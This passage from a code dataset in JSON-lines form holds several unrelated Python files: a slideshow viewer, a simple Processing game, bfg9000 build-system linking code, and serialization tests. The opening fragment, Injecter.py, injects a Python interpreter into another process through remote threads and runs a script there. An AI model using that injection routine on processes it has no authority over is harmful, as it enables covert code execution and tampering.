k) for k in [b'Py_InitializeEx', b'PyRun_SimpleString', b'Py_FinalizeEx']}\n\nparam_addr = memory.allocate_memory(4, handler)\nmemory.write_memory(ctypes.c_int, param_addr, 1, handler)\nprocess.start_thread(funcs[b'Py_InitializeEx'], param_addr, handler)\n\nwdir = os.path.abspath('.')\nlog_path = os.path.join(wdir, 'out.log').replace(\"\\\\\", \"\\\\\\\\\")\nerr_path = os.path.join(wdir, 'err.log').replace(\"\\\\\", \"\\\\\\\\\")\nshellcode = \"\"\"\nimport sys\nfrom os import chdir\nfrom traceback import format_exc\ninit_modules = sys.modules.copy()\ntry:\n sys.path=%s\n chdir(sys.path[0])\n exec(open(\"%s\",encoding='utf-8').read())\nexcept:\n with open(\"%s\", \"w+\") as f:\n f.write(format_exc())\nfinally:\n for key in sys.modules.keys():\n if key not in init_modules:\n del sys.modules[key]\n\"\"\" % (\n dumps(sys.path),\n 'Entrance.py',\n err_path\n)\n\nshellcode = shellcode.encode('utf-8')\nshellcode_addr = memory.allocate_memory(len(shellcode), handler)\nwritten = ctypes.c_ulonglong(0)\nmemory.write_bytes(shellcode_addr, shellcode, handler=handler)\n_thread.start_new_thread(process.start_thread, (funcs[b'PyRun_SimpleString'], shellcode_addr,), {'handler': handler})\n\nprint(\"waiting for initialization...\")\nHOST, PORT = \"127.0.0.1\", 3520\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nwhile True:\n try:\n sock.connect((HOST, PORT))\n break\n except:\n time.sleep(1)\nprint(\"connect!\")\nwhile True:\n try:\n size = int.from_bytes(sock.recv(4), 'little', signed=True)\n if size < 
0:\n print('end')\n sock.close()\n time.sleep(2)\n break\n else:\n print(sock.recv(size).decode('utf-8'))\n except:\n break\nprocess.start_thread(funcs[b'Py_FinalizeEx'], handler=handler)\n","sub_path":"Injecter.py","file_name":"Injecter.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"248383405","text":"#!/usr/bin/env python\n\"\"\"\nSlideshow\n\nCopyright (c) 2010 Liam Cooke\n\nPermission is hereby granted, free of charge, to any person\nobtaining a copy of this software and associated documentation\nfiles (the \"Software\"), to deal in the Software without\nrestriction, including without limitation the rights to use,\ncopy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following\nconditions:\n\nThe above copyright notice and this permission notice shall be\nincluded in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\nOF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\nNONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\nHOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\nOTHER DEALINGS IN THE SOFTWARE.\n\n\"\"\"\nimport itertools\nimport optparse\nimport os\nimport random\nimport sys\nfrom itertools import cycle\n\nimport wx\n\n\nKEY_ESC = 27\nEXTS = ('.jpg', '.jpeg', '.gif', '.png')\n\n\ndef get_images(imagedir='.'):\n images = []\n for root, dirs, files in os.walk(imagedir):\n for img in files:\n if os.path.splitext(img)[-1].lower() not in EXTS:\n continue\n images.append(os.path.join(root, img))\n return images\n\ndef fit_image(image, area):\n if not image or not area or not area.x or not area.y:\n return\n x, y = image.GetWidth(), image.GetHeight()\n ratio = float(x) / float(y)\n x = area.x\n y = int(area.x / ratio)\n if y > area.y:\n y = area.y\n x = int(area.y * ratio)\n image.Rescale(x, y, wx.IMAGE_QUALITY_HIGH)\n pos = (area.x - image.GetWidth())/2, (area.y - image.GetHeight())/2\n image.Resize((area.x, area.y), pos, 1, 1, 1)\n\nclass SlideshowPanel(wx.Panel):\n def __init__(self, parent, images, delay):\n wx.Panel.__init__(self, parent=parent)\n self.frame = parent\n self.SetBackgroundColour('black')\n\n self.images = cycle(images)\n self.image = None\n\n self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnEraseBackground)\n self.Bind(wx.EVT_MOTION, self.OnMouse)\n self.Bind(wx.EVT_KEY_UP, self.OnKeyUp)\n\n self.timer = wx.PyTimer(self.Notify)\n self.timer.Start(delay)\n self.Notify()\n\n def OnEraseBackground(self, event=None):\n dc = event and event.GetDC()\n if not dc:\n dc = wx.ClientDC(self)\n rect = self.GetUpdateRegion().GetBox()\n dc.SetClippingRect(rect)\n dc.Clear()\n img = wx.Image(self.image, wx.BITMAP_TYPE_ANY)\n fit_image(img, dc.GetSize())\n dc.DrawBitmap(img.ConvertToBitmap(), 0, 0)\n\n def Notify(self):\n self.image = self.images.next()\n self.OnEraseBackground()\n\n def OnMouse(self, event):\n if not event.Dragging():\n self._dragpos = None\n return\n self.CaptureMouse()\n if not self._dragpos:\n self._dragpos = event.GetPosition()\n else:\n pos = event.GetPosition()\n displacement = self._dragpos - pos\n self.frame.SetPosition(self.frame.GetPosition() - 
displacement)\n\n def OnKeyUp(self, event):\n if event.GetKeyCode() in (KEY_ESC, ord('Q')):\n self.frame.Close(force=True)\n else:\n event.Skip()\n\nclass SlideshowFrame(wx.Frame):\n def __init__(self, images, delay, size, opacity):\n wx.Frame.__init__(self, None, size=size or (320, 240), style=wx.NO_BORDER)\n self.panel = SlideshowPanel(self, images, delay)\n self.Center()\n if not size:\n self.panel.SetCursor(wx.StockCursor(wx.CURSOR_BLANK))\n self.SetTransparent(int(255 * opacity))\n\nclass SlideshowApp(wx.App):\n def __init__(self, images, delay, size, opacity, redirect=False, filename=None):\n wx.App.__init__(self, redirect, filename)\n dlg = SlideshowFrame(images, delay, size, opacity)\n if not size:\n dlg.ShowFullScreen(True)\n dlg.Show()\n\ndef main():\n parser = optparse.OptionParser()\n parser.add_option('-i', '--images', metavar='DIR', default='.',\n help='where to look for images (default: .)')\n parser.add_option('-d', '--delay', metavar='SECONDS', type='float', default=3.0,\n help='delay between images (default: 3)')\n parser.add_option('-r', '--random', action='store_true', default=False,\n help='show images in random order')\n parser.add_option('-w', '--window', metavar='WIDTH', type='int', default=0,\n help='window width (leave at 0 for fullscreen)')\n parser.add_option('-o', '--opacity', type='float', default=1.0,\n help='window opacity (default: 1.0)')\n opts, args = parser.parse_args()\n\n imagedir = os.path.realpath(opts.images)\n images = get_images(imagedir)\n if not images:\n parser.error('no images found in %s' % imagedir)\n\n if opts.random:\n random.shuffle(images)\n\n size, width = None, opts.window\n if width:\n if width == 1:\n width = 640\n elif width < 80:\n parser.error('minimum width of 80 pixels expected')\n size = (width, int(width * 0.75))\n\n if opts.opacity < 0 or opts.opacity > 1:\n parser.error('opacity must be between 0.0 and 1.0')\n\n app = SlideshowApp(images, int(opts.delay*1000), size, opts.opacity)\n app.MainLoop()\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"grab-bag/slideshow.py","file_name":"slideshow.py","file_ext":"py","file_size_in_byte":5720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"596964156","text":"s = 0 \nclass gameObject():\n \n def __init__(self, c, xpos, ypos, velocity, lives):\n self.c = c\n self.xpos = xpos\n self.ypos = ypos\n self.vel = velocity\n self.lives = lives\n \n \nclass Basket(gameObject):\n \n # drawing the basket\n def display(self):\n \n stroke(self.c)\n fill(self.c)\n rect(self.xpos , height - 10, 80, 10)\n rect(self.xpos , height - 20, 10, 15)\n rect( self.xpos + 70 , height - 20, 10, 15)\n \n \n def move(self):\n \n if keyPressed:\n if keyCode == RIGHT:\n self.xpos = (self.xpos + 10) % width\n \n if keyCode == LEFT:\n self.xpos = (self.xpos -10) % width\n \n def intersect(self):\n return self.xpos\n \n def life(self):\n \n if self.lives > 1:\n self.lives = self.lives - 1\n return False\n \n else:\n return True\n #if true the game will end \n \n\nclass Ball(gameObject):\n \n def display(self):\n fill (self.c)\n noStroke()\n ellipse (self.xpos,self.ypos,20,20)\n \n \n def fall (self):\n \n if s+1 % 2 == 0:\n self.vel += 0.5\n \n if height - 10 <= self.ypos <= height:\n self.ypos = random(-500,-50)\n self.xpos = random (width)\n \n self.ypos = self.ypos + self.vel\n \n def xposition(self):\n return self.xpos\n \n def yposition(self):\n return self.ypos\n\n \nclass Score(): \n def check (self,b,y,x):\n \n if height - 10 <= y <= height 
:\n if b < x < b + 70:\n global s\n s += 1\n return True\n return False\n return True\n \n \nbasket = Basket(color(0), 0, 100, 5, 3)\nball = Ball(color(255, 0, 0), 100, 100, 3,3) \nballs = []\nscore = Score()\n \ndef setup():\n size(450,400)\n frameRate(30)\n for i in range (0,3):\n balls.append(ball)\n \ndef draw():\n background(255)\n for i in range(0,len(balls)):\n balls[i].fall()\n balls[i].display()\n\n if score.check(basket.intersect(),ball.yposition(),ball.xposition()) :\n background(255)\n fill(0, 102, 153)\n \n text('score:', 10, 30)\n text(s, 10, 50)\n \n text('lives left:', 80, 30)\n text(basket.lives, 80, 50)\n \n for i in range(0,len(balls)):\n balls[i].fall()\n balls[i].display()\n \n basket.display()\n basket.move()\n\n else:\n \n if basket.life():\n background(0)\n fill(255)\n textSize(32)\n textAlign(CENTER, BOTTOM)\n text(\"Game over\", 0.5*width, 0.5*height) \n\n \n else:\n ball.display()\n ball.fall()\n basket.display()\n basket.move()\n","sub_path":"catchthefruit3.py","file_name":"catchthefruit3.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"479166906","text":"import os.path\nimport re\nimport warnings\nfrom collections import defaultdict\nfrom itertools import chain\nfrom six import string_types\nfrom six.moves import reduce, filter as ifilter\n\nfrom . import builtin\nfrom .compile import Compile, ObjectFiles\nfrom .file_types import local_file\nfrom ..backends.make import writer as make\nfrom ..backends.ninja import writer as ninja\nfrom ..build_inputs import build_input, Edge\nfrom ..file_types import *\nfrom ..iterutils import (first, iterate, listify, merge_dicts, merge_into_dict,\n slice_dict, uniques)\nfrom ..path import Path, Root\nfrom ..shell import posix as pshell\n\nbuild_input('link_options')(lambda build_inputs, env: {\n 'dynamic': defaultdict(list), 'static': defaultdict(list)\n})\n\n_modes = {\n 'shared_library': 'EXPORTS',\n 'static_library': 'STATIC',\n}\n\n\ndef library_macro(name, mode):\n if mode not in _modes:\n return []\n\n # Since the name always begins with \"lib\", this always produces a valid\n # macro name.\n return ['{name}_{suffix}'.format(\n name=re.sub(r'\\W', '_', name.upper()), suffix=_modes[mode]\n )]\n\n\nclass Link(Edge):\n msbuild_output = True\n\n def __init__(self, builtins, build, env, name, files=None, includes=None,\n include=None, pch=None, libs=None, packages=None,\n compile_options=None, link_options=None, entry_point=None,\n lang=None, extra_deps=None):\n self.name = self.__name(name)\n\n self.user_libs = [\n builtins['library'](i, kind=self._preferred_lib, lang=lang)\n for i in iterate(libs)\n ]\n forward_opts = self.__get_forward_opts(self.user_libs)\n self.libs = self.user_libs + forward_opts.get('libs', [])\n\n self.user_packages = [builtins['package'](i)\n for i in iterate(packages)]\n self.packages = self.user_packages + forward_opts.get('packages', [])\n\n # XXX: Remove `include` after 0.3 is released.\n self.user_files = builtins['object_files'](\n files, includes=includes, include=include, pch=pch,\n libs=self.user_libs, packages=self.user_packages,\n options=compile_options, lang=lang\n )\n self.files = sum(\n (getattr(i, 'extra_objects', []) for i in self.user_files),\n self.user_files\n )\n\n if ( len(self.files) == 0 and\n not any(isinstance(i, WholeArchive) for i in self.user_libs) ):\n raise ValueError('need at least one source file')\n\n self.user_options = pshell.listify(link_options)\n 
self.forwarded_options = forward_opts.get('options', [])\n\n if entry_point:\n self.entry_point = entry_point\n\n formats = uniques(i.format for i in chain(self.files, self.libs,\n self.packages))\n if len(formats) > 1:\n raise ValueError('cannot link multiple object formats')\n\n self.langs = uniques(chain(\n (i.lang for i in self.files if i.lang is not None),\n (j for i in self.libs for j in iterate(i.lang))\n ))\n if not self.langs:\n raise ValueError('unable to determine language')\n\n self.linker = self.__find_linker(env, formats[0], self.langs)\n\n # To handle the different import/export rules for libraries, we need to\n # provide some LIBFOO_EXPORTS/LIBFOO_STATIC macros so the build knows\n # how to annotate public API functions in the headers. XXX: One day, we\n # could pass these as \"semantic options\" (i.e. options that are\n # specified like define('FOO') instead of '-DFOO'). Then the linkers\n # could generate those options in a more generic way.\n defines = []\n if self.linker.has_link_macros:\n defines = library_macro(self.name, self.mode)\n defines = forward_opts.get('defines', []) + defines\n\n for i in self.files:\n if isinstance(i.creator, Compile):\n i.creator.add_link_options(self.mode, defines)\n\n if hasattr(self.linker, 'pre_build'):\n self.linker.pre_build(build, self, name)\n\n output = self.linker.output_file(name, self)\n primary = first(output)\n public_output = None\n\n if hasattr(self.linker, 'post_build'):\n public_output = self.linker.post_build(build, self, output)\n\n self._fill_options(env, output)\n\n Edge.__init__(self, build, output, public_output, extra_deps)\n\n if hasattr(self.linker, 'post_install'):\n primary.post_install = self.linker.post_install(output)\n build['defaults'].add(primary)\n\n @classmethod\n def __name(cls, name):\n head, tail = os.path.split(name)\n return os.path.join(head, cls._prefix + tail)\n\n @staticmethod\n def __get_forward_opts(libs):\n result = {}\n\n def accumulate(libs):\n for i in libs:\n if hasattr(i, 'forward_opts'):\n merge_into_dict(result, i.forward_opts)\n accumulate(i.forward_opts.get('libs', []))\n\n accumulate(libs)\n return result\n\n def __find_linker(self, env, format, langs):\n for i in langs:\n linker = env.builder(i).linker(self.mode)\n if linker.can_link(format, langs):\n return linker\n raise ValueError('unable to find linker')\n\n\nclass DynamicLink(Link):\n base_mode = 'dynamic'\n mode = 'executable'\n msbuild_mode = 'Application'\n _preferred_lib = 'shared'\n _prefix = ''\n\n @property\n def options(self):\n return (self._internal_options + self.forwarded_options +\n self.user_options)\n\n def _fill_options(self, env, output):\n if hasattr(self.linker, 'flags'):\n self._internal_options = (\n sum((i.ldflags(self.linker, output)\n for i in self.packages), []) +\n self.linker.flags(self, output)\n )\n else:\n self._internal_options = []\n\n if hasattr(self.linker, 'libs'):\n linkers = (env.builder(i).linker(self.mode) for i in self.langs)\n self.lib_options = (\n sum((i.always_libs(i is self.linker) for i in linkers), []) +\n sum((i.ldlibs(self.linker, output)\n for i in self.packages), []) +\n self.linker.libs(self, output)\n )\n\n first(output).runtime_deps.extend(\n i.runtime_file for i in self.libs if i.runtime_file\n )\n\n\nclass SharedLink(DynamicLink):\n mode = 'shared_library'\n msbuild_mode = 'DynamicLibrary'\n _prefix = 'lib'\n\n extra_kwargs = ('version', 'soversion')\n\n def __init__(self, *args, **kwargs):\n self.version = kwargs.pop('version', None)\n self.soversion = 
kwargs.pop('soversion', None)\n if (self.version is None) != (self.soversion is None):\n raise ValueError('specify both version and soversion or neither')\n DynamicLink.__init__(self, *args, **kwargs)\n\n\nclass StaticLink(Link):\n base_mode = 'static'\n mode = 'static_library'\n msbuild_mode = 'StaticLibrary'\n _preferred_lib = 'static'\n _prefix = 'lib'\n\n extra_kwargs = ('static_link_options',)\n\n def __init__(self, *args, **kwargs):\n self.static_options = pshell.listify(\n kwargs.pop('static_link_options', None)\n )\n Link.__init__(self, *args, **kwargs)\n\n @property\n def options(self):\n # Only pass the static-link options to the static linker. The other\n # options are forwarded on to the dynamic linker when this library is\n # used.\n return self.static_options\n\n def _fill_options(self, env, output):\n primary = first(output)\n primary.forward_opts = {\n 'options': self.user_options,\n 'libs': self.user_libs,\n 'packages': self.user_packages,\n }\n if self.linker.has_link_macros:\n macro = library_macro(self.name, self.mode)\n primary.forward_opts['defines'] = macro\n\n primary.linktime_deps.extend(self.user_libs)\n\n\n@builtin.globals('builtins', 'build_inputs', 'env')\n@builtin.type(Executable)\ndef executable(builtins, build, env, name, files=None, **kwargs):\n if files is None and 'libs' not in kwargs:\n params = [('format', env.platform.object_format), ('lang', 'c')]\n return local_file(build, Executable, name, params, **kwargs)\n return DynamicLink(builtins, build, env, name, files,\n **kwargs).public_output\n\n\n@builtin.globals('builtins', 'build_inputs', 'env')\n@builtin.type(SharedLibrary, in_type=string_types + (DualUseLibrary,))\ndef shared_library(builtins, build, env, name, files=None, **kwargs):\n if isinstance(name, DualUseLibrary):\n if files is not None or not set(kwargs.keys()) <= {'format', 'lang'}:\n raise TypeError('unexpected arguments')\n return name.shared\n\n if files is None and 'libs' not in kwargs:\n # XXX: What to do for pre-built shared libraries for Windows, which has\n # a separate DLL file?\n params = [('format', env.platform.object_format), ('lang', 'c')]\n return local_file(build, SharedLibrary, name, params, **kwargs)\n return SharedLink(builtins, build, env, name, files,\n **kwargs).public_output\n\n\n@builtin.globals('builtins', 'build_inputs', 'env')\n@builtin.type(StaticLibrary, in_type=string_types + (DualUseLibrary,))\ndef static_library(builtins, build, env, name, files=None, **kwargs):\n if isinstance(name, DualUseLibrary):\n if files is not None or not set(kwargs.keys()) <= {'format', 'lang'}:\n raise TypeError('unexpected arguments')\n return name.static\n\n if files is None and 'libs' not in kwargs:\n params = [('format', env.platform.object_format), ('lang', 'c')]\n return local_file(build, StaticLibrary, name, params, **kwargs)\n return StaticLink(builtins, build, env, name, files,\n **kwargs).public_output\n\n\n@builtin.globals('builtins', 'build_inputs', 'env')\n@builtin.type(Library, in_type=string_types + (DualUseLibrary,))\ndef library(builtins, build, env, name, files=None, **kwargs):\n if env.library_mode.shared and env.library_mode.static:\n kind = 'dual'\n elif env.library_mode.shared:\n kind = 'shared'\n elif env.library_mode.static:\n kind = 'static'\n else:\n raise ValueError('unable to create library: both shared and static ' +\n 'modes disabled')\n\n explicit_kind = 'kind' in kwargs\n kind = kwargs.pop('kind', kind)\n\n if isinstance(name, DualUseLibrary):\n if files is not None or not set(kwargs.keys()) <= 
{'format', 'lang'}:\n raise TypeError('unexpected arguments')\n return name if kind == 'dual' else getattr(name, kind)\n\n if files is None and 'libs' not in kwargs:\n params = [('format', env.platform.object_format), ('lang', 'c')]\n file_type = StaticLibrary\n\n if explicit_kind:\n if kind == 'shared':\n file_type = SharedLibrary\n # Ignore the lang argument for shared libraries.\n params = params[:1]\n kwargs.pop('lang')\n elif kind == 'dual':\n raise ValueError(\"can't create dual-use libraries from an \" +\n \"existing file\")\n\n # XXX: Try to detect if a string refers to a shared lib?\n return local_file(build, file_type, name, params, **kwargs)\n\n shared_kwargs = slice_dict(kwargs, SharedLink.extra_kwargs)\n static_kwargs = slice_dict(kwargs, StaticLink.extra_kwargs)\n shared_kwargs.update(kwargs)\n static_kwargs.update(kwargs)\n\n if kind == 'dual':\n shared = SharedLink(builtins, build, env, name, files, **shared_kwargs)\n if not shared.linker.builder.can_dual_link:\n warnings.warn(\"dual linking not supported with {}\"\n .format(shared.linker.brand))\n return shared.public_output\n\n static = StaticLink(builtins, build, env, name, shared.files,\n **static_kwargs)\n return DualUseLibrary(shared.public_output, static.public_output)\n elif kind == 'shared':\n return SharedLink(builtins, build, env, name, files,\n **shared_kwargs).public_output\n else: # kind == 'static'\n return StaticLink(builtins, build, env, name, files,\n **static_kwargs).public_output\n\n\n@builtin.globals('builtins')\n@builtin.type(WholeArchive, in_type=string_types + (StaticLibrary,))\ndef whole_archive(builtins, name, *args, **kwargs):\n if isinstance(name, StaticLibrary):\n if len(args) or len(kwargs):\n raise TypeError('unexpected arguments')\n return WholeArchive(name)\n else:\n return WholeArchive(builtins['static_library'](name, *args, **kwargs))\n\n\n@builtin.globals('build_inputs')\ndef global_link_options(build, options, family='native', mode='dynamic'):\n for i in iterate(family):\n build['link_options'][mode][i].extend(pshell.listify(options))\n\n\ndef _get_flags(backend, rule, build_inputs, buildfile):\n variables = {}\n cmd_kwargs = {}\n\n if hasattr(rule.linker, 'flags_var'):\n global_ldflags, ldflags = backend.flags_vars(\n rule.linker.flags_var,\n (rule.linker.global_flags +\n build_inputs['link_options'][rule.base_mode][rule.linker.family]),\n buildfile\n )\n cmd_kwargs = {'flags': ldflags}\n if rule.options:\n variables[ldflags] = [global_ldflags] + rule.options\n\n if hasattr(rule.linker, 'libs_var'):\n global_ldlibs, ldlibs = backend.flags_vars(\n rule.linker.libs_var, rule.linker.global_libs, buildfile\n )\n cmd_kwargs['libs'] = ldlibs\n if rule.lib_options:\n variables[ldlibs] = [global_ldlibs] + rule.lib_options\n\n if hasattr(rule, 'manifest'):\n var = backend.var('manifest')\n cmd_kwargs['manifest'] = var\n variables[var] = rule.manifest\n\n return variables, cmd_kwargs\n\n\n@make.rule_handler(StaticLink, DynamicLink, SharedLink)\ndef make_link(rule, build_inputs, buildfile, env):\n linker = rule.linker\n variables, cmd_kwargs = _get_flags(make, rule, build_inputs, buildfile)\n\n output_params = []\n if len(rule.output) == 1:\n output_vars = make.qvar('@')\n else:\n output_vars = []\n for i in range(linker.num_outputs):\n v = make.var(str(i + 2))\n output_vars.append(v)\n output_params.append(rule.output[i])\n\n recipename = make.var('RULE_{}'.format(linker.rule_name.upper()))\n if not buildfile.has_variable(recipename):\n buildfile.define(recipename, [linker(\n make.var('1'), 
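# reviewer note (added): this 'define' is expanded via $(call RULE_X, ...) in\n            # make.Call() below, so $(1) receives the input file list; when the linker\n            # produces several outputs, the vars bound with make.var(str(i + 2)) above\n            # arrive as $(2), $(3), ...\n            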
output_vars, **cmd_kwargs\n )])\n\n files = rule.files\n if hasattr(rule.linker, 'transform_input'):\n files = rule.linker.transform_input(files)\n\n manifest = listify(getattr(rule, 'manifest', None))\n dirs = uniques(i.path.parent() for i in rule.output)\n make.multitarget_rule(\n buildfile,\n targets=rule.output,\n deps=rule.files + rule.libs + manifest + rule.extra_deps,\n order_only=[i.append(make.dir_sentinel) for i in dirs if i],\n recipe=make.Call(recipename, files, *output_params),\n variables=variables\n )\n\n\n@ninja.rule_handler(StaticLink, DynamicLink, SharedLink)\ndef ninja_link(rule, build_inputs, buildfile, env):\n linker = rule.linker\n variables, cmd_kwargs = _get_flags(ninja, rule, build_inputs, buildfile)\n\n if len(rule.output) == 1:\n output_vars = ninja.var('out')\n elif linker.num_outputs == 1:\n output_vars = ninja.var('output')\n variables[output_vars] = rule.output[0]\n else:\n output_vars = []\n for i in range(linker.num_outputs):\n v = ninja.var('output{}'.format(i + 1))\n output_vars.append(v)\n variables[v] = rule.output[i]\n\n if hasattr(rule.linker, 'transform_input'):\n input_var = ninja.var('input')\n variables[input_var] = rule.linker.transform_input(rule.files)\n else:\n input_var = ninja.var('in')\n\n if not buildfile.has_rule(linker.rule_name):\n buildfile.rule(name=linker.rule_name, command=linker(\n input_var, output_vars, **cmd_kwargs\n ))\n\n manifest = listify(getattr(rule, 'manifest', None))\n buildfile.build(\n output=rule.output,\n rule=linker.rule_name,\n inputs=rule.files,\n implicit=rule.libs + manifest + rule.extra_deps,\n variables=variables\n )\n\n\ntry:\n from .compile import CompileHeader\n from ..backends.msbuild import writer as msbuild\n\n def _reduce_compile_options(files, global_cflags):\n creators = [i.creator for i in files if i.creator]\n compilers = uniques(i.linker for i in creators)\n\n return reduce(merge_dicts, chain(\n (i.parse_flags(msbuild.textify_each(\n i.global_flags + global_cflags[i.lang]\n )) for i in compilers),\n (i.linker.parse_flags(msbuild.textify_each(\n i.options\n )) for i in creators)\n ))\n\n def _parse_common_cflags(compiler, global_cflags):\n return compiler.parse_flags(msbuild.textify_each(\n compiler.global_flags + global_cflags[compiler.lang]\n ))\n\n def _parse_file_cflags(file, per_compiler_cflags):\n cflags = file.creator.compiler.parse_flags(\n msbuild.textify_each(file.creator.options)\n )\n if not per_compiler_cflags:\n return cflags\n key = file.creator.compiler.command_var\n return merge_dicts(per_compiler_cflags[key], cflags)\n\n @msbuild.rule_handler(DynamicLink, SharedLink, StaticLink)\n def msbuild_link(rule, build_inputs, solution, env):\n if ( any(i not in ['c', 'c++'] for i in rule.langs) or\n rule.linker.flavor != 'msvc' ):\n raise ValueError('msbuild backend currently only supports c/c++ ' +\n 'with msvc')\n\n output = rule.output[0]\n\n # Parse compilation flags; if there's only one set of them (i.e. the\n # command_var is the same for every compiler), we can apply these to\n # all the files at once. 
Otherwise, we need to apply them to each file\n # individually so they all get the correct options.\n obj_creators = [i.creator for i in rule.files]\n compilers = uniques(i.compiler for i in obj_creators)\n\n per_compiler_cflags = {}\n for c in compilers:\n key = c.command_var\n if key not in per_compiler_cflags:\n per_compiler_cflags[key] = c.parse_flags(msbuild.textify_each(\n c.global_flags + build_inputs['compile_options'][c.lang]\n ))\n\n if len(per_compiler_cflags) == 1:\n common_cflags = per_compiler_cflags.popitem()[1]\n else:\n common_cflags = None\n\n # Parse linking flags.\n ldflags = rule.linker.parse_flags(msbuild.textify_each(\n (rule.linker.global_flags +\n build_inputs['link_options'][rule.base_mode][rule.linker.family] +\n rule.options)\n ))\n ldflags['libs'] = (\n getattr(rule.linker, 'global_libs', []) +\n getattr(rule, 'lib_options', [])\n )\n if hasattr(output, 'import_lib'):\n ldflags['import_lib'] = output.import_lib\n\n deps = chain(\n (i.creator.file for i in rule.files),\n chain.from_iterable(i.creator.header_files for i in rule.files),\n chain.from_iterable(i.creator.extra_deps for i in rule.files),\n ifilter(None, (getattr(i.creator, 'pch_source', None)\n for i in rule.files)),\n rule.libs, rule.extra_deps\n )\n\n def get_source(file):\n # Get the source file for this compilation rule; it's either a\n # regular source file or a PCH source file.\n if isinstance(file.creator, CompileHeader):\n return file.creator.pch_source\n return file.creator.file\n\n # Create the project file.\n project = msbuild.VcxProject(\n env, name=rule.name,\n mode=rule.msbuild_mode,\n output_file=output,\n files=[{\n 'name': get_source(i),\n 'options': _parse_file_cflags(i, per_compiler_cflags),\n } for i in rule.files],\n compile_options=common_cflags,\n link_options=ldflags,\n dependencies=solution.dependencies(deps),\n )\n solution[output] = project\nexcept ImportError:\n pass\n","sub_path":"bfg9000/builtins/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":20824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"42578768","text":"# Copyright (C) 2014 Peter Todd \n#\n# This file is part of python-smartcolors.\n#\n# It is subject to the license terms in the LICENSE file found in the top-level\n# directory of this distribution.\n#\n# No part of python-smartcolors, including this file, may be copied, modified,\n# propagated, or distributed except according to the terms contained in the\n# LICENSE file.\n\nimport io\nimport unittest\nimport uuid\n\nfrom proofmarshal import *\nfrom proofmarshal.test import load_test_vectors, x, b2x\n\nclass boxed_varuint(ImmutableProof):\n \"\"\"Dummy object with a single varuint in it\"\"\"\n\n HASH_HMAC_KEY = x('dd2617248e435da6db7c119c17cc19cd')\n\n def __init__(self, i):\n object.__setattr__(self, 'i', i)\n\n def _ctx_serialize(self, ctx):\n ctx.write_varuint('i', self.i)\n\n def _ctx_deserialize(self, ctx):\n object.__setattr__(self, 'i', ctx.read_varuint('i'))\n\nclass boxed_bytes(ImmutableProof):\n \"\"\"Dummy object with a single bytes attribute\"\"\"\n\n HASH_HMAC_KEY = x('f690a4d282810e868a0d7d59578a6585')\n EXPECTED_LENGTH = None\n\n def __init__(self, buf):\n object.__setattr__(self, 'buf', buf)\n\n def _ctx_serialize(self, ctx):\n ctx.write_bytes('buf', self.buf, self.EXPECTED_LENGTH)\n\n def _ctx_deserialize(self, ctx):\n object.__setattr__(self, 'buf', ctx.read_bytes('buf', self.EXPECTED_LENGTH))\n\nclass boxed_objs(ImmutableProof):\n \"\"\"Object with other 
objects\"\"\"\n\n HASH_HMAC_KEY = x('296d566c10ebb4b92e8a7f6e909eb191')\n\n def __init__(self, buf, i):\n object.__setattr__(self, 'buf', boxed_bytes(buf))\n object.__setattr__(self, 'i', boxed_varuint(i))\n\n def _ctx_serialize(self, ctx):\n ctx.write_obj('buf', self.buf)\n ctx.write_obj('i', self.i)\n\n def _ctx_deserialize(self, ctx):\n object.__setattr__(self, 'buf', ctx.read_obj('buf', boxed_bytes))\n object.__setattr__(self, 'i', ctx.read_obj('i', boxed_varuint))\n\nclass Test_BytesSerializationContext(unittest.TestCase):\n def test_varuint(self):\n \"\"\"Test varuints against vectors\"\"\"\n\n for expected_hex_bytes, expected_value in load_test_vectors('valid_varuints.json'):\n expected_bytes = x(expected_hex_bytes)\n\n # serialize\n actual_bytes = boxed_varuint(expected_value).serialize()\n self.assertEqual(b2x(expected_bytes), b2x(actual_bytes))\n\n # deserialize\n actual_value = boxed_varuint.deserialize(expected_bytes).i\n self.assertEqual(expected_value, actual_value)\n\n def test_bytes(self):\n \"\"\"Test bytes against vectors\"\"\"\n\n for expected_hex_bytes, expected_hex_value, expected_length in load_test_vectors('valid_bytes.json'):\n expected_bytes = x(expected_hex_bytes)\n expected_value = x(expected_hex_value)\n\n class our_boxed_bytes(boxed_bytes):\n EXPECTED_LENGTH=expected_length\n\n # serialize\n actual_bytes = our_boxed_bytes(expected_value).serialize()\n self.assertEqual(b2x(expected_bytes), b2x(actual_bytes))\n\n # deserialize\n actual_value = our_boxed_bytes.deserialize(expected_bytes).buf\n self.assertEqual(b2x(expected_value), b2x(actual_value))\n\n def test_objs(self):\n \"\"\"Test object serialization\"\"\"\n for expected_hex_serialized_bytes, expected_hex_buf, expected_i, expected_hex_hash \\\n in load_test_vectors('valid_boxed_objs.json'):\n\n expected_serialized_bytes = x(expected_hex_serialized_bytes)\n expected_buf = x(expected_hex_buf)\n\n # serialize\n actual_serialized_bytes = boxed_objs(expected_buf, expected_i).serialize()\n self.assertEqual(b2x(expected_serialized_bytes), b2x(actual_serialized_bytes))\n\n # deserialize\n actual_boxed_obj = boxed_objs.deserialize(expected_serialized_bytes)\n self.assertEqual(b2x(expected_buf), b2x(actual_boxed_obj.buf.buf))\n self.assertEqual(expected_i, actual_boxed_obj.i.i)\n\n # 